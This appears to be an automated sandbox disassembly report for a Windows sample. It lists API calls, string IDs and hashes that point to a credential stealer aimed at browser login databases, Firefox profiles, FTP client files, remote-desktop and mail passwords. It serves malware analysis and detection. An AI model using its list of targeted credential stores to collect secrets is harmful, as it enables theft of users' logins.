                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BD30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpilstrlen
                                        • String ID: CONSTRAINT$origin_url$password_value$username_value
                                        • API String ID: 3649823140-2401479949
                                        • Opcode ID: 22a1df6da15ee93e844beba5c23c9a2cd52371af7b3e65fbb9d11862cf7c5522
                                        • Instruction ID: 549c6056515963588f9c1146d25089613da6e7bea94f329fa0bd8592f56e9fc9
                                        • Opcode Fuzzy Hash: 22a1df6da15ee93e844beba5c23c9a2cd52371af7b3e65fbb9d11862cf7c5522
                                        • Instruction Fuzzy Hash: 95112E73650605E9CF112B25DC02EDE7A51EFB5398B048037F858A41E1E7BDCAD1975C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                        • API String ID: 0-4107377610
                                        • Opcode ID: 9d9c89784d7f7bbd85dc3e2337b9e06639f09dd76c69a63164768edded6efc33
                                        • Instruction ID: d858c12de6229d8d70ef6c10e3873df91c46ce366050ec7153196185a8c1e61a
                                        • Opcode Fuzzy Hash: 9d9c89784d7f7bbd85dc3e2337b9e06639f09dd76c69a63164768edded6efc33
                                        • Instruction Fuzzy Hash: 13414F72950206BACF226B61CC02EEF7B72AF50358F14457BB424741F2DB7E4DA1AB49
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004046F8
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404710
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00404721
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00404730
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                        • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                        • API String ID: 977827838-3073145729
                                        • Opcode ID: 1bbb540219231b58824e5ab77e48160b5774ed33d0de01fcb38bdce5d520b492
                                        • Instruction ID: 7c28e420826eabaaf05b666c02c110936013fafb471106d1de9b0548cecc0825
                                        • Opcode Fuzzy Hash: 1bbb540219231b58824e5ab77e48160b5774ed33d0de01fcb38bdce5d520b492
                                        • Instruction Fuzzy Hash: 8CF030B771030866CB1172B9AC46BEF21DC8BD13E5F2A0577A111F72C1EABCCD804269
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <setting name="$value="
                                        • API String ID: 0-3468128162
                                        • Opcode ID: b43be731758bd1bacb88d17d9386c407736c9e079e5ee7bf1f106b048158055e
                                        • Instruction ID: 194ceef87dfbcb69aef3b57f18e8d6d2d392925be7a5bad02b64de4594db0886
                                        • Opcode Fuzzy Hash: b43be731758bd1bacb88d17d9386c407736c9e079e5ee7bf1f106b048158055e
                                        • Instruction Fuzzy Hash: D831E672D082599ECB11ABE08C42AFE7FB19F16318F1500A7F401B3292D27D5E44DB6D
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040205B
                                        • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402069
                                        • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040207D
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402092
                                        • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004020A1
                                        • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004020A8
                                        • CloseHandle.KERNEL32(?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004020B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$Create$MappingSizeView
                                        • String ID:
                                        • API String ID: 3733816638-0
                                        • Opcode ID: 4c2131ddec283f7362195489ee9faca0348458e052251f6b49f45dba0ad7f2a7
                                        • Instruction ID: 6ff59398d09ff71369010619fbe8f939629311b037752696d147ce4a1850af33
                                        • Opcode Fuzzy Hash: 4c2131ddec283f7362195489ee9faca0348458e052251f6b49f45dba0ad7f2a7
                                        • Instruction Fuzzy Hash: 811152B1290300BAEF312F75CC87F553A94AB11B58F648166B714BD1D6DAF89880C71D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ftp://$http://$https://
                                        • API String ID: 0-2804853444
                                        • Opcode ID: 422e00a736fdf7ffc5ed8a188e6e05459ba2a1bb1e396985e275d1436b7afc8b
                                        • Instruction ID: 261c2f2b83a7ad3ffecd7f8a3ac648be864c99f0da7d8168c567202a184b1b20
                                        • Opcode Fuzzy Hash: 422e00a736fdf7ffc5ed8a188e6e05459ba2a1bb1e396985e275d1436b7afc8b
                                        • Instruction Fuzzy Hash: 9D612672900108FEDF11AF91CD01AEEBB79EF04348F40807BB841B51A1DB7A9B94DB99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: "/>$winex="
                                        • API String ID: 0-1498080979
                                        • Opcode ID: 71b9f5829aad57cee214cc7e725d5a8c9d7fd70879b2c8b13c194a81f8eb12bc
                                        • Instruction ID: 9d1d581915e091d244ed3be2239e5641f0114326bb8b50a03fb89d61f8d95767
                                        • Opcode Fuzzy Hash: 71b9f5829aad57cee214cc7e725d5a8c9d7fd70879b2c8b13c194a81f8eb12bc
                                        • Instruction Fuzzy Hash: E4316E72810109BECF016BA2CC02DEE7A76AF54348F144437F511B51B2DB7D5A61EB59
                                        APIs
                                        • StrStrIA.SHLWAPI(00542E18,FTPCON), ref: 00408463
                                        • StrStrIA.SHLWAPI(00541FA8,FTP CONTROL,00000000,00542E18,FTPCON), ref: 0040846F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                        • API String ID: 0-2908215140
                                        • Opcode ID: 788b682c2aacaeba675ba1e794ec048645995e3248955f3ef26a6c41f5091c1a
                                        • Instruction ID: 63f6a582a31ca3e0dd9f1a5c6312de0303cffdcfdb84ee9d096ffaea876654e5
                                        • Opcode Fuzzy Hash: 788b682c2aacaeba675ba1e794ec048645995e3248955f3ef26a6c41f5091c1a
                                        • Instruction Fuzzy Hash: EA01F5B1500606BAEB112731DD02FEF3A599B91324F24813FF898B51E2EB7C1A8182DC
                                        APIs
                                        • GetHGlobalFromStream.OLE32(?,?,0040FE4B), ref: 0040FE5B
                                        • GlobalLock.KERNEL32(?), ref: 0040FE7C
                                        • GlobalUnlock.KERNEL32(?), ref: 0040FE94
                                        • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FE4B), ref: 0040FEAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$FromLockStreamUnlock
                                        • String ID: STATUS-IMPORT-OK
                                        • API String ID: 2287449323-1591331578
                                        • Opcode ID: ba4b5c9f78cce44668a517f99baab74ff39a9ca6980be9040cdda160361d9401
                                        • Instruction ID: fd286837766a8a9240475fc2ea522612fe4cadf4428e7323ec020fd49669a328
                                        • Opcode Fuzzy Hash: ba4b5c9f78cce44668a517f99baab74ff39a9ca6980be9040cdda160361d9401
                                        • Instruction Fuzzy Hash: C9016172A14248BBCF126BB1CC4299E7B76DF01308F1480BBB410B54B3DA7D9A95DA58
                                        APIs
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        • lstrlenA.KERNEL32(?), ref: 0040247D
                                        • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                        • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$lstrcatlstrcpy
                                        • String ID: .exe
                                        • API String ID: 2414487701-4119554291
                                        • Opcode ID: ace233f8ca1625aa5691f84f09ce995b372257633a6f05252a680a3774831c5a
                                        • Instruction ID: bfd6875b47a2cc1e20eba2977a61168174313ec8c059100834985ed10b07fdd8
                                        • Opcode Fuzzy Hash: ace233f8ca1625aa5691f84f09ce995b372257633a6f05252a680a3774831c5a
                                        • Instruction Fuzzy Hash: 19F0C83160828578DB226225CC09FAF7E859B92795F280077F514AA2C2D7FC9881926D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <_OP3_Password2
                                        • API String ID: 0-4172175086
                                        • Opcode ID: 25812717ef707eae2ae4c8ea79630e572756801a93e9bfb41c838885812c8dcc
                                        • Instruction ID: d612185a7ae8ddbcfc4e81528d8c685fb532cb6270b3aecff53feb4812be29f4
                                        • Opcode Fuzzy Hash: 25812717ef707eae2ae4c8ea79630e572756801a93e9bfb41c838885812c8dcc
                                        • Instruction Fuzzy Hash: 33419D72900009FECF12ABA2DC019EE7E72AF58314F144477F510B51A1D73D8E61DB69
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D059
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040D07F
                                        • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D0A3
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D0C5
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D0B0
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                        • String ID:
                                        • API String ID: 1890766102-0
                                        • Opcode ID: 7c1ddf97d11231fc6f9719559a9c2a6d6c756f456982bcddd4f27ae86e8f830d
                                        • Instruction ID: 50cffe499a2c34a400854f72f514bb2440c9afb9d1d98cf658c0f101d2fa3403
                                        • Opcode Fuzzy Hash: 7c1ddf97d11231fc6f9719559a9c2a6d6c756f456982bcddd4f27ae86e8f830d
                                        • Instruction Fuzzy Hash: 86214CB2D44208BEEF216BE1CC02F9E7E74AF10318F20806AF115B91E1D6BD5A919B18
                                        APIs
                                        • StrStrIA.SHLWAPI(00541FA8,FTP Navigator), ref: 00405EAC
                                        • StrStrIA.SHLWAPI(00541FA8,FTP Commander,00541FA8,FTP Navigator), ref: 00405EDA
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                        • API String ID: 1884169789-2424314702
                                        • Opcode ID: 408c8dbacc7ca950034744205d7c8e270d7fd61b2b0d675d7d05c429344d31a7
                                        • Instruction ID: 37272958ca72b37d3f7b8cc0c50ac0d482ab522f8c39d3d7ffd2998172c17a04
                                        • Opcode Fuzzy Hash: 408c8dbacc7ca950034744205d7c8e270d7fd61b2b0d675d7d05c429344d31a7
                                        • Instruction Fuzzy Hash: A60108B15005067ADB113731CC02FAF3A18EF81318F24803BB510B11E2DBBC5E819AEC
                                        APIs
                                        • StrStrIA.SHLWAPI(00542E18,FTPNow), ref: 0040D2D5
                                        • StrStrIA.SHLWAPI(00542E18,FTP Now,00542E18,FTPNow), ref: 0040D2E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: FTP Now$FTPNow$sites.xml
                                        • API String ID: 0-284577462
                                        • Opcode ID: a3ca3d5c4a3b2b8510dee4d94e9884ca803d34a407db987cda011ab10b367688
                                        • Instruction ID: 3ec6e7a9122d4db8382e3876f21d9f9689c3d7025df328ec6a69311aaec69a26
                                        • Opcode Fuzzy Hash: a3ca3d5c4a3b2b8510dee4d94e9884ca803d34a407db987cda011ab10b367688
                                        • Instruction Fuzzy Hash: 9BF0F4B590010176DB212BB48C03FBF3A568B92754F28413BB910B12E3EBBDDE91925D
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C865
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C887
                                        • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C89B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$OpenStorage
                                        • String ID: Settings
                                        • API String ID: 2489594185-473154195
                                        • Opcode ID: 9f6b67f5e02b164fb478122a98204d74f34fcf19fb9127d3e142759181cd1ed9
                                        • Instruction ID: 66fdbea4ebbab1985e0bd365db80c5e4d625af8f0380fa5ef8b59165c94ce83d
                                        • Opcode Fuzzy Hash: 9f6b67f5e02b164fb478122a98204d74f34fcf19fb9127d3e142759181cd1ed9
                                        • Instruction Fuzzy Hash: CD311E31A4020AFBDF11AF91CC42FDEBB72AF44744F208176B620791F1D7755A51AB58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: http://$https://
                                        • API String ID: 0-1916535328
                                        • Opcode ID: 56b7a2f3b57d12a53a10b98ac0129a4b2a238f1f9158c5a5933ce5d698a738a4
                                        • Instruction ID: 10dabf40450e44178f33ec249889296fb841353c0e9ad22b317d2de01f524ca7
                                        • Opcode Fuzzy Hash: 56b7a2f3b57d12a53a10b98ac0129a4b2a238f1f9158c5a5933ce5d698a738a4
                                        • Instruction Fuzzy Hash: 1E412A31810109FADF12BF91CD05BEE7B72AF40318F50807AB491351F1DB7A5AA0EB59
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00401B32
                                        • GetHGlobalFromStream.OLE32(?,?), ref: 00401B4B
                                        • GlobalLock.KERNEL32(?), ref: 00401B66
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • GlobalUnlock.KERNEL32(?), ref: 00401B8E
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                                        • String ID:
                                        • API String ID: 1884134869-0
                                        • Opcode ID: 102ff5740556d289dc569bf70e42cc8854418f5872dd2683080fa1c2e952d023
                                        • Instruction ID: ff5a7e9a5442a4ed85009e21393d30accebdb174d392cd4e994c245d6b766a7c
                                        • Opcode Fuzzy Hash: 102ff5740556d289dc569bf70e42cc8854418f5872dd2683080fa1c2e952d023
                                        • Instruction Fuzzy Hash: A421B87690020DBBDF02AFE1CC82DDDBB75AF04348F0040BAB615B50B1DB799B959B58
                                        APIs
                                          • Part of subcall function 00401607: lstrlenA.KERNEL32(00000000), ref: 00401613
                                        • StrStrIA.SHLWAPI(?,00416144), ref: 0040CF26
                                        • lstrlenA.KERNEL32(TERMSRV/,?,00416144), ref: 0040CF34
                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00416144), ref: 0040CF44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: TERMSRV/
                                        • API String ID: 1659193697-3001602198
                                        • Opcode ID: e7c6d292ac75772df7a407141648a7ce6ac9a4609a9c1acb67da7efe31f585d2
                                        • Instruction ID: 56d9c26654d81067f07aa167816c22782833b7b2e80897679c0056a5e51c6480
                                        • Opcode Fuzzy Hash: e7c6d292ac75772df7a407141648a7ce6ac9a4609a9c1acb67da7efe31f585d2
                                        • Instruction Fuzzy Hash: 8511DA31410109FBCF126F61CC429DE3E32AF54399F144526B925791F2D77ADAA1AB88
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 00401EA9
                                        • lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$lstrcatlstrcpy
                                        • String ID:
                                        • API String ID: 2414487701-0
                                        • Opcode ID: afd82815c8c99cdaeefa24fc75ffa890a2982f6f5c1c001fce2fa764d9baefb3
                                        • Instruction ID: ca77cd74d2a533e6ebf082bb26d92fc69d9dac365f3726b13707cc28114e5187
                                        • Opcode Fuzzy Hash: afd82815c8c99cdaeefa24fc75ffa890a2982f6f5c1c001fce2fa764d9baefb3
                                        • Instruction Fuzzy Hash: 54F012B1500208BFCF11AF61CC859DD3BA8AF2439CF00C43BBC0918162D7BD89D48B88
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 0040933C
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040935D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
